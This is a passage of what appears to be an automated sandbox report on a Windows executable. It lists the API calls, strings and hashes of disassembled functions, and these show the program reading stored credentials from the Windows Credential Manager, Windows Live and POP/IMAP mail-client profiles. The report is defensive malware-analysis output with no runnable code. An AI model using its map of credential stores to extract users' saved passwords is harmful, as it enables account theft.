                                                                                                                                                                  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00410142
                                                                                                                                                                • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                                • memset.MSVCRT ref: 00410129
                                                                                                                                                                  • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                  • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                                                                                                                                                • memset.MSVCRT ref: 00410171
                                                                                                                                                                • memcpy.MSVCRT ref: 0041018C
                                                                                                                                                                • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                • String ID: \systemroot
                                                                                                                                                                • API String ID: 912701516-1821301763
                                                                                                                                                                • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                                                                • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                                                • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                                                                • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$strlen
                                                                                                                                                                • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                • API String ID: 2619041689-3408036318
                                                                                                                                                                • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                                • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$strlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4288758904-3916222277
                                                                                                                                                                • Opcode ID: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                                                                • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                                                                • Opcode Fuzzy Hash: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                                                                • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                                • _wcsncoll.MSVCRT ref: 00408794
                                                                                                                                                                • memset.MSVCRT ref: 0040882A
                                                                                                                                                                • memcpy.MSVCRT ref: 00408849
                                                                                                                                                                • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                                                                                                                                                • String ID: J$Microsoft_WinInet
                                                                                                                                                                • API String ID: 2203907242-260894208
                                                                                                                                                                • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                                                                • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                                                • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                                                                • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                                                                • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                • memcpy.MSVCRT ref: 00410961
                                                                                                                                                                Strings
                                                                                                                                                                • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                                                                • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                                                                • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                                                                • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FromStringUuid$memcpy
                                                                                                                                                                • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                • API String ID: 2859077140-2022683286
                                                                                                                                                                • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                                                                • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                                                                • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                                                                • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00406D9B,?,?), ref: 00406CA1
                                                                                                                                                                • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00406D9B,?,?), ref: 00406CBF
                                                                                                                                                                • strlen.MSVCRT ref: 00406CCC
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00406CDC
                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,00406D9B,?,?), ref: 00406CE6
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00406CF6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                • API String ID: 2881943006-572158859
                                                                                                                                                                • Opcode ID: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                                                                                                                                                • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                                                                                                                                • Opcode Fuzzy Hash: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                                                                                                                                                • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00409686
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00409696
                                                                                                                                                                • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                                  • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                • API String ID: 888011440-2039793938
                                                                                                                                                                • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                                                                • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                                                • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                                                                • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • database %s is already in use, xrefs: 0042E9CE
                                                                                                                                                                • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                                                                • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                                                                • database is already attached, xrefs: 0042EA97
                                                                                                                                                                • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                                                                • out of memory, xrefs: 0042EBEF
                                                                                                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                • API String ID: 1297977491-2001300268
                                                                                                                                                                • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                                                                                • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A3E
                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A4C
                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A5D
                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A74
                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A7D
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409C53
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409C6F
                                                                                                                                                                • memcpy.MSVCRT ref: 00409C97
                                                                                                                                                                • memcpy.MSVCRT ref: 00409CB4
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409D3D
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409D47
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409D7F
                                                                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                • String ID: 0wE$d
                                                                                                                                                                • API String ID: 2915808112-1552800882
                                                                                                                                                                • Opcode ID: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                                                                                                                                                • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                                                                                                                                • Opcode Fuzzy Hash: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                                                                                                                                                • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                                • strchr.MSVCRT ref: 0040327B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PrivateProfileStringstrchr
                                                                                                                                                                • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                • API String ID: 1348940319-1729847305
                                                                                                                                                                • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                                • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                                                                • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                                • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                • memset.MSVCRT ref: 0040FA1E
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                • API String ID: 945165440-3589380929
                                                                                                                                                                • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                                                                • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                  • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                                                                                                                                                                • strchr.MSVCRT ref: 0040371F
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00403748
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00403758
                                                                                                                                                                • strlen.MSVCRT ref: 00403778
                                                                                                                                                                • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                                • _mbscpy.MSVCRT ref: 004037B2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                                                                                                                                                • String ID: %s@gmail.com
                                                                                                                                                                • API String ID: 500647785-4097000612
                                                                                                                                                                • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                                                                • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                                                                • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                                                                • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 004094C8
                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                                • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                                • memset.MSVCRT ref: 0040950C
                                                                                                                                                                • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                                • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                • String ID: sysdatetimepick32
                                                                                                                                                                • API String ID: 3411445237-4169760276
                                                                                                                                                                • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                                                                • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                                                • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                                                                • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                                                                  • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                                                                  • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                                                                  • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Item$DialogMessageSend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2485852401-0
                                                                                                                                                                • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                                                                                                • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                                • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                                • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                                • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                                • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                                Memory Dump Source
